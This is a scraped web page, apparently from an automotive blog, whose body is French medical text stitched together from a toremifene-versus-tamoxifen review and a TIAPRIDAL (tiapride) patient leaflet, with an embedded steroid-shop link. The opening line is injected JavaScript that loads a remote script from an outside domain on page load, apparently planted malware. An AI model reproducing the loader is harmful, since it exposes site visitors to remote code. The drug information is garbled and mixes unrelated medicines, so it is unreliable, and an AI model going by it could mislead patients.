;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Torémifène versus tamoxifène pour le cancer du sein avancéIntuned Online

Torémifène versus tamoxifène pour le cancer du sein avancé

22 Mar, 2024

Torémifène versus tamoxifène pour le cancer du sein avancé

Chez les patientes ménopausées atteintes de cancer du sein, le traitement par le torémifène est associé à une diminution modérée de la cholestérolémie totale et de la teneur plasmatique en lipoprotéines de basse densité (LDL). Vous devez être vigilant si vous conduisez ou si vous utilisez une machine. TIAPRIDAL 100 mg, comprimé sécable peut entraîner une absence de menstruation ou d'ovulation et peut réduire la fertilité chez l’humain. Ne jetez aucun médicament au tout-à-l'égout ou avec les ordures ménagères. Demandez à votre pharmacien d’éliminer les médicaments que vous n’utilisez plus.

  • Dans certains cancers expérimentaux et/ou après administration de doses élevées, le torémifène provoque des effets antitumoraux non estrogène-dépendants.
  • Vous avez ressenti un effet indésirable susceptible d’être dû à ce médicament, vous pouvez le déclarer en ligne.
  • Dans le domaine de l'hormonothérapie, le tamoxifène (TAM) est le plus ancien et le plus prescrit des modulateurs sélectifs des récepteurs aux œstrogènes.
  • Si vous avez d’autres questions sur l’utilisation de ce médicament, demandez plus d’informations à votre médecin ou à votre pharmacien.

Informez votre médecin si vous prenez par ailleurs des anticoagulants oraux. Il est utilisé chez la femme ménopausée dans le traitement de certains cancers du sein. Il a également, de façon paradoxale, des effets de stimulation sur l'utérus, les os (protection contre l'ostéoporose de la ménopause) et la synthèse des graisses.

QUELS SONT LES EFFETS INDESIRABLES EVENTUELS ?

Le torémifène (TOR), qui peut également être utilisé pour traiter le cancer du sein avancé, a un mode d'action similaire à celui du TAM. L'objectif de cette revue était de comparer le TOR avec le TAM en termes de survie globale, de réponse au traitement, de délai jusqu'à progression et d'effets indésirables. Vous ne devez jamais prendre ce médicament avec la cabergoline, le quinagolide (médicaments utilisés dans les troubles de la lactation), le citalopram, l’escitalopram, l’hydroxyzine, la pipéraquine et la dompéridone. Vous pourriez ressentir une somnolence, une sédation (effet apaisant), une baisse de la pression artérielle, des symptômes extrapyramidaux (notamment des tremblements, une rigidité musculaire) ou vous pourriez tomber dans le coma. Toutefois, en règle générale, les dérivés non stéroïdiens du triphényléthylène exercent essentiellement une action anti-estrogénique chez le rat et chez l'homme, et estrogénique chez la souris. Comme tous les médicaments, ce médicament peut provoquer des effets indésirables, mais ils ne surviennent pas systématiquement chez tout le monde.

Torémifène versus tamoxifène pour le cancer du sein avancé

Vous ne devez pas allaiter pendant le traitement par TIAPRIDAL 100 mg, comprimé sécable. Demandez à votre médecin quelle est la meilleure façon de nourrir votre bébé si vous prenez TIAPRIDAL100 mg, comprimé sécable. TIAPRIDAL 100 mg, comprimé sécable appartient à une famille de médicaments appelés antipsychotiques. Le TOR et le TAM sont pareillement efficaces et le profil d'innocuité du premier n'est, au minimum, pas plus mauvais que celui-ci du second dans le traitement de première intention des patientes atteintes d'un cancer du sein avancé. Le TOR peut donc constituer une alternative raisonnable au TAM quand il convient d'utiliser des anti-œstrogènes mais que le TAM n'a pas la préférence pour une raison quelconque. Les données de cette revue laissent penser que le TOR et le TAM sont pareillement efficaces et que le profil d'innocuité du premier n'est, au minimum, pas plus mauvais que celui-ci du second dans le traitement de première intention des patientes atteintes d'un cancer du sein avancé.

INFORMATIONS RELATIVES À LA SÉCURITÉ DU PATIENT

Si une de ces situations se produit, vous ou votre entourage devez impérativement appeler un médecin ou un service d’urgence. Chez les enfants proches de la puberté, une évaluation régulière sera réalisée par un médecin en raison de possibles https://jewella.pk/fr-steroide-anabolisants-com/le-letrozole-de-plus-en-plus-utilise-dans-le/ effets hormonaux. Votre enfant devra être suivi régulièrement par un médecin pendant toute la durée du traitement. Ce médicament est utilisé pour traiter les mouvements involontaires (tics sévères) chez l’adulte et l’enfant.

Adressez-vous à votre médecin ou votre pharmacien avant de prendre TIAPRIDAL 100 mg, comprimé sécable. La survenue d’une rigidité des muscles ou de troubles de la conscience ou d’une fièvre inexpliquée au cours du traitement nécessite l’arrêt immédiat du traitement et une consultation médicale d’urgence. Si vous avez d’autres questions sur l’utilisation de ce médicament, demandez plus d’informations à votre médecin ou à votre pharmacien.

Si vous avez oublié plusieurs doses, demandez l’avis de votre médecin. Les comprimés sont sécables, c’est-à-dire que vous pouvez, si besoin, les couper en 4 doses égales. Contactez rapidement votre médecin, si votre bébé souffre d’un de ces symptômes. O chez les personnes âgées, notamment si elles sont atteintes de démence. Vous avez ressenti un effet indésirable susceptible d’être dû à ce médicament, vous pouvez le déclarer en ligne. Bouffées de chaleur (20% des sujets), sueurs (14%), nausées (8%), pertes blanches (8%), étourdissements (4%), œdème (3%), douleurs diverses (2%), vomissements (2%).

Dans ces essais, 25,8 % des patients du groupe TOR avaient répondu au traitement, contre 26,9 % dans le groupe TAM. Les cancers de 50 % des patients du groupe TOR avaient progressé après 6,1 mois, et après 5,8 mois dans le groupe TAM. La moitié des patients dans le groupe TOR avait survécu plus de 27,8 mois, et plus de 27,6 mois dans le groupe TAM. Le risque de progression et de décès dans le groupe TOR n'était pas significativement différent de celui dans le groupe TAM. Les fréquences de la plupart des événements indésirables étaient également similaires dans les deux groupes, à l'exception du nombre de maux de tête qui n'était dans le groupe TOR qu'environ un septième de ce qu'il était dans le groupe TAM. Toutefois, compte tenu des résultats d'autres essais à grande échelle, nous ne pouvons pas exclure la possibilité que cela soit purement un effet du hasard.

About the author

Ryan Jones

Ryan works to strategically plan the company’s direction; in addition to serving as editor-in-chief. Raised in Montreal, Canada, Jones grew up in an automotive family as a second generation car fanatic, his father being a former ISCA competitor (1950 Mercury). As the apple did not fall far from the tree , Jones has worked on numerous show cars including his own Honda Civic which has been honored with a variety of trophies. In addition to IntunedOnline, Ryan has worked in account and operations management supporting and a variety of Fortune 500 clients.

Instagram: Carbonlaced

Twitter: @Carbonlaced

Related Posts